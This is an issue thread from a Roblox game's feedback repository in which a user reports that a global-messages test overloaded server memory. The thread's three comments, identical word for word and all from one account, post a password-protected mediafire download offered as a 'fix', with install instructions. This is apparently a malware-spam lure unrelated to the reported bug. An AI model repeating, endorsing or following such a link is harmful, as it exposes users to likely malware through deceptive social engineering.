### ISSUE TITLE
[BUG]: Global messages causes the memory problems

### ISSUE THREAD

**Issue by jaydenmelbourne** [typical-developers/oaklands-feedback#900]
### Roblox Username

JaydenLeeMelbourne

### What version did this issue occur in?

1.66.0

### Describe the issue in detail.

When hoofer tested the global messages, it overloaded my servers memory and shut down the server

### Provide some images / videos of the issue in action.

I cant get a image or recording since the server was shut down and it was in the past

### Before Submitting

- [X] I have confirmed that nobody else reported this issue.
- [X] The details of this report are legitimate.
- [X] I understand that I cannot be reimbursed here for in-game content I have lost.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
